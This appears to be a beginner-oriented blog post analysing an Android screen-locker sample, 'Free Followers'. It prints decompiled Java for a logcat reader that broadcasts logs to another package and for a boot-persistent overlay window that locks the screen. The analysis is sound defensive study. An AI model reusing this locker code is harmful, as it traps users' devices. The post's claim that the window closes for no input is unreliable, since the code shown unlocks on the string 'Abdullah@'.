Malware - Free Followers

#security #malware #androidsecurity #java

I found this malware sample from malwareBazaar.

SHA-256 Hash: 5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e

When we open the application we are greeted with a window that looks like

Note: We cant close this window

Lets dive into APK Analysis with inspecting Android Manifest.xml

There are 2 suspicious permissions to keep in mind

android.permission.SYSTEM_ALERT_WINDOW

This permission allows an app to create windows
android.permission.WAKE_LOCK

allows your app to keep the device awake, even when the device is in sleep mode

Lets dive into Main Activity

Two important things to notice is

ADRTLogCatReader.onContext(this, "com.aide.ui");
startService(new Intent(this, Class.forName("com.XPhantom.id.MyService")));

If we look into ADRTLogCatReader, we could see a suspicious code

public void run() {
        try {
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    return;
                }
                ADRTSender.sendLogcatLines(new String[]{readLine});
            }
        } catch (IOException e) {
        }
    }

We could a malicious command getting executed during Runtime. The command logcat -v threadtime can give details like date, invocation time, priority, tag, PID, and TID of the thread issuing the message.

Now another suspicious code is this line ADRTSender.sendLogcatLines(new String[]{readLine}); where the details from our logcat is passed as argument.

If we look into sendLogcatLines()

public static void sendLogcatLines(String[] strArr) {
        Intent intent = new Intent();
        intent.setPackage(debuggerPackageName);
        intent.setAction("com.adrt.LOGCAT_ENTRIES");
        intent.putExtra("lines", strArr);
        context.sendBroadcast(intent);
    }

We could see that our logs is sent to an app whose package name was defined in MainActivity (ie com.aide.ui) using intents.

Now lets look for the reason why window is there (and why not closable).

Since no other code other than invoking the service was called, lets look into the service implementation and yes we get the reason.

public void onCreate() {
        ADRTLogCatReader.onContext(this, "com.aide.ui");
        this.windowManager = (WindowManager) getSystemService("window");
        this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(C0000R.layout.main, (ViewGroup) null);
        this.chatHead = new ImageView(this);
        this.chatHead.setImageResource(C0000R.drawable.ic_launcher);
        this.f0e1 = (EditText) this.myView.findViewById(C0000R.C0001id.mainEditText1);
        ((Button) this.myView.findViewById(C0000R.C0001id.mainButton1)).setOnClickListener(new View.OnClickListener(this) { // from class: com.XPhantom.id.MyService.100000000

            /* renamed from: this$0 */
            private final MyService thiss;

            {
                this.thiss = this;
            }

            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                if (this.thiss.f0e1.getText().toString().equals("Abdullah@")) {
                    this.thiss.windowManager.removeView(this.thiss.myView);
                    try {
                        this.thiss.context.startService(new Intent(this.thiss.context, Class.forName("com.XPhantom.id.MyService")));
                        return;
                    } catch (ClassNotFoundException e) {
                        throw new NoClassDefFoundError(e.getMessage());
                    }
                }
                this.thiss.f0e1.setText("");
            }
        });
        WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams(-2, -2, 2002, 1, -3);
        layoutParams.gravity = 17;
        layoutParams.x = 0;
        layoutParams.y = 0;
        new View(this).setBackgroundColor(872349696);
        this.windowManager.addView(this.myView, layoutParams);
    }

We could understand that this window is programmed not to close for any input provided in the Editbox.

Another important thing to note is that this window open even if we didnt open the app and it opens when we turn on our phone after power-off and the reason for this is a BroadcastReceiver that calls the service for the intent android.intent.action.BOOT_COMPLETED .

Ending Note

This was a fun malware to look into and I would recommend those who are getting started in Android Reversing / Malware Analysis to started with this sample.